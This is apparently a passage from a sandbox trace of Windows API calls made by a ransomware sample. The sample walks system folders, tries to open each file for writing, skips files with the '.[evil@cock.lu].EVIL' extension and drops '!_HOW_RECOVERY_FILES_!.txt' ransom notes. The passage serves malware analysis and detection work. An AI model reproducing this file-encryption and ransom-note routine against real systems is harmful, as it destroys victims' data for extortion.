(_String1="msado20.tlb", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.018] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msado20.tlb") returned 0x0 [0090.018] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\ado\\msado20.tlb") returned 0x35 [0090.018] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\ado\\msado20.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado20.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.019] GetLastError () returned 0x5 [0090.019] FindNextFileW (in: hFindFile=0x84b11dd5c0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.019] wcsstr (_Str="msado21.tlb", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.019] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\ado\\msado21.tlb") returned 53 [0090.019] wcscmp (_String1="msado21.tlb", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.019] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msado21.tlb") returned 0x0 [0090.019] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\ado\\msado21.tlb") returned 0x35 [0090.019] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\ado\\msado21.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado21.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.019] GetLastError () returned 0x5 [0090.019] FindNextFileW (in: hFindFile=0x84b11dd5c0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.019] wcsstr (_Str="msado25.tlb", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.019] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\ado\\msado25.tlb") returned 53 [0090.019] wcscmp (_String1="msado25.tlb", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.019] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msado25.tlb") returned 0x0 [0090.019] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\ado\\msado25.tlb") returned 0x35 [0090.019] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\ado\\msado25.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado25.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.020] GetLastError () returned 0x5 [0090.020] FindNextFileW (in: hFindFile=0x84b11dd5c0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.020] wcsstr (_Str="msado26.tlb", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.020] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\ado\\msado26.tlb") returned 53 [0090.020] wcscmp (_String1="msado26.tlb", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.020] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msado26.tlb") returned 0x0 [0090.020] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\ado\\msado26.tlb") returned 0x35 [0090.020] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\ado\\msado26.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado26.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.020] GetLastError () returned 0x5 [0090.020] FindNextFileW (in: hFindFile=0x84b11dd5c0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.020] wcsstr (_Str="msado27.tlb", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.020] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\ado\\msado27.tlb") returned 53 [0090.020] wcscmp (_String1="msado27.tlb", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.020] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msado27.tlb") returned 0x0 [0090.020] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\ado\\msado27.tlb") returned 0x35 [0090.020] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\ado\\msado27.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado27.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.020] GetLastError () returned 0x5 [0090.020] FindNextFileW (in: hFindFile=0x84b11dd5c0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.020] wcsstr (_Str="msado28.tlb", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.020] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\ado\\msado28.tlb") returned 53 [0090.020] wcscmp (_String1="msado28.tlb", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.020] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msado28.tlb") returned 0x0 [0090.020] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\ado\\msado28.tlb") returned 0x35 [0090.020] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\ado\\msado28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado28.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.021] GetLastError () returned 0x5 [0090.021] FindNextFileW (in: hFindFile=0x84b11dd5c0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.021] wcsstr (_Str="msado60.tlb", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.021] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\ado\\msado60.tlb") returned 53 [0090.021] wcscmp (_String1="msado60.tlb", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.021] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msado60.tlb") returned 0x0 [0090.021] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\ado\\msado60.tlb") returned 0x35 [0090.021] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\ado\\msado60.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado60.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.021] GetLastError () returned 0x5 [0090.021] FindNextFileW (in: hFindFile=0x84b11dd5c0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.021] wcsstr (_Str="msadomd.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.021] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\ado\\msadomd.dll") returned 53 [0090.021] wcscmp (_String1="msadomd.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.021] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msadomd.dll") returned 0x0 [0090.021] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\ado\\msadomd.dll") returned 0x35 [0090.021] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\ado\\msadomd.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msadomd.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.022] GetLastError () returned 0x5 [0090.022] FindNextFileW (in: hFindFile=0x84b11dd5c0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.022] wcsstr (_Str="msadomd28.tlb", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.022] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb") returned 55 [0090.022] wcscmp (_String1="msadomd28.tlb", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.022] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msadomd28.tlb") returned 0x0 [0090.022] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb") returned 0x37 [0090.022] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msadomd28.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.022] GetLastError () returned 0x5 [0090.022] FindNextFileW (in: hFindFile=0x84b11dd5c0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.022] wcsstr (_Str="msador15.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.022] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\ado\\msador15.dll") returned 54 [0090.022] wcscmp (_String1="msador15.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.022] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msador15.dll") returned 0x0 [0090.022] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\ado\\msador15.dll") returned 0x36 [0090.022] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\ado\\msador15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msador15.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.023] GetLastError () returned 0x5 [0090.023] FindNextFileW (in: hFindFile=0x84b11dd5c0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.023] wcsstr (_Str="msador28.tlb", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.023] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\ado\\msador28.tlb") returned 54 [0090.023] wcscmp (_String1="msador28.tlb", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.023] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msador28.tlb") returned 0x0 [0090.023] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\ado\\msador28.tlb") returned 0x36 [0090.023] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\ado\\msador28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msador28.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.023] GetLastError () returned 0x5 [0090.023] FindNextFileW (in: hFindFile=0x84b11dd5c0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.023] wcsstr (_Str="msadox.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.023] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\ado\\msadox.dll") returned 52 [0090.023] wcscmp (_String1="msadox.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.023] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msadox.dll") returned 0x0 [0090.023] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\ado\\msadox.dll") returned 0x34 [0090.023] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\ado\\msadox.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msadox.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.023] GetLastError () returned 0x5 [0090.023] FindNextFileW (in: hFindFile=0x84b11dd5c0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.023] wcsstr (_Str="msadox28.tlb", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.023] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\ado\\msadox28.tlb") returned 54 [0090.024] wcscmp (_String1="msadox28.tlb", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.024] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msadox28.tlb") returned 0x0 [0090.024] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\ado\\msadox28.tlb") returned 0x36 [0090.024] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\ado\\msadox28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msadox28.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.024] GetLastError () returned 0x5 [0090.024] FindNextFileW (in: hFindFile=0x84b11dd5c0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.024] wcsstr (_Str="msadrh15.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.024] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\ado\\msadrh15.dll") returned 54 [0090.024] wcscmp (_String1="msadrh15.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.024] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msadrh15.dll") returned 0x0 [0090.024] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\ado\\msadrh15.dll") returned 0x36 [0090.024] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\ado\\msadrh15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msadrh15.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.025] GetLastError () returned 0x5 [0090.025] FindNextFileW (in: hFindFile=0x84b11dd5c0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 0 [0090.025] FindClose (in: hFindFile=0x84b11dd5c0 | out: hFindFile=0x84b11dd5c0) returned 1 [0090.025] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\ado") returned 0x29 [0090.025] strlen (_Str="${KEY}") returned 0x6 [0090.025] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0090.025] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0090.025] strlen (_Str="${CODE}") returned 0x7 [0090.025] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0090.025] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0090.025] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0090.025] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\System\\ado\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0090.025] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0090.025] __uncaught_exception () returned 0x84b1160800 [0090.025] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0090.026] FindNextFileW (in: hFindFile=0x84b11dd7a0, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0090.026] wcsstr (_Str="DirectDB.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.026] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\DirectDB.dll") returned 50 [0090.026] wcscmp (_String1="DirectDB.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.026] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DirectDB.dll") returned 0x0 [0090.026] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\DirectDB.dll") returned 0x32 [0090.026] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\DirectDB.dll" (normalized: "c:\\program files\\common files\\system\\directdb.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.026] GetLastError () returned 0x5 [0090.026] FindNextFileW (in: hFindFile=0x84b11dd7a0, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0090.026] wcsstr (_Str="en-US", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.026] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\en-US") returned 43 [0090.026] wcscmp (_String1=".", _String2="en-US") returned -1 [0090.026] wcscmp (_String1="..", _String2="en-US") returned -1 [0090.026] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\en-US") returned 0x2b [0090.026] wcscpy_s (in: _Destination=0x84b0fde170, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\System\\en-US" | out: _Destination="C:\\\\Program Files\\Common Files\\System\\en-US") returned 0x0 [0090.026] wcscat (in: _Dest=0x84b0fde170, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\en-US\\*") returned="C:\\\\Program Files\\Common Files\\System\\en-US\\*" [0090.027] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\System\\en-US\\*", lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 0x84b11dd0e0 [0090.027] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.027] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\en-US\\.") returned 45 [0090.027] wcscmp (_String1=".", _String2=".") returned 0 [0090.027] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.027] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.027] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\en-US\\..") returned 46 [0090.027] wcscmp (_String1=".", _String2="..") returned -1 [0090.027] wcscmp (_String1="..", _String2="..") returned 0 [0090.027] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.027] wcsstr (_Str="wab32res.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.027] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\en-US\\wab32res.dll.mui") returned 60 [0090.027] wcscmp (_String1="wab32res.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.027] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="wab32res.dll.mui") returned 0x0 [0090.027] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\en-US\\wab32res.dll.mui") returned 0x3c [0090.027] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\en-US\\wab32res.dll.mui" (normalized: "c:\\program files\\common files\\system\\en-us\\wab32res.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.027] GetLastError () returned 0x5 [0090.027] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 0 [0090.027] FindClose (in: hFindFile=0x84b11dd0e0 | out: hFindFile=0x84b11dd0e0) returned 1 [0090.027] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\en-US") returned 0x2b [0090.027] strlen (_Str="${KEY}") returned 0x6 [0090.027] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0090.027] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0090.027] strlen (_Str="${CODE}") returned 0x7 [0090.027] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0090.027] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0090.027] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0090.028] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\System\\en-US\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0090.028] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0090.028] __uncaught_exception () returned 0x84b1160800 [0090.028] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0090.029] FindNextFileW (in: hFindFile=0x84b11dd7a0, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0090.029] wcsstr (_Str="msadc", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.029] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\msadc") returned 43 [0090.029] wcscmp (_String1=".", _String2="msadc") returned -1 [0090.029] wcscmp (_String1="..", _String2="msadc") returned -1 [0090.029] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\msadc") returned 0x2b [0090.029] wcscpy_s (in: _Destination=0x84b0fde170, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\System\\msadc" | out: _Destination="C:\\\\Program Files\\Common Files\\System\\msadc") returned 0x0 [0090.029] wcscat (in: _Dest=0x84b0fde170, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\msadc\\*") returned="C:\\\\Program Files\\Common Files\\System\\msadc\\*" [0090.029] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\System\\msadc\\*", lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 0x84b11dd080 [0090.030] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.030] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\msadc\\.") returned 45 [0090.030] wcscmp (_String1=".", _String2=".") returned 0 [0090.030] FindNextFileW (in: hFindFile=0x84b11dd080, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.030] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.030] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\msadc\\..") returned 46 [0090.030] wcscmp (_String1=".", _String2="..") returned -1 [0090.030] wcscmp (_String1="..", _String2="..") returned 0 [0090.030] FindNextFileW (in: hFindFile=0x84b11dd080, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.030] wcsstr (_Str="adcjavas.inc", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.030] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 56 [0090.030] wcscmp (_String1="adcjavas.inc", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.030] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="adcjavas.inc") returned 0x0 [0090.030] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 0x38 [0090.030] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcjavas.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.031] GetLastError () returned 0x5 [0090.031] FindNextFileW (in: hFindFile=0x84b11dd080, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.031] wcsstr (_Str="adcvbs.inc", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.031] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned 54 [0090.031] wcscmp (_String1="adcvbs.inc", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.031] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="adcvbs.inc") returned 0x0 [0090.031] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned 0x36 [0090.031] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcvbs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.031] GetLastError () returned 0x5 [0090.031] FindNextFileW (in: hFindFile=0x84b11dd080, lpFindFileData=0x84b0fddf20 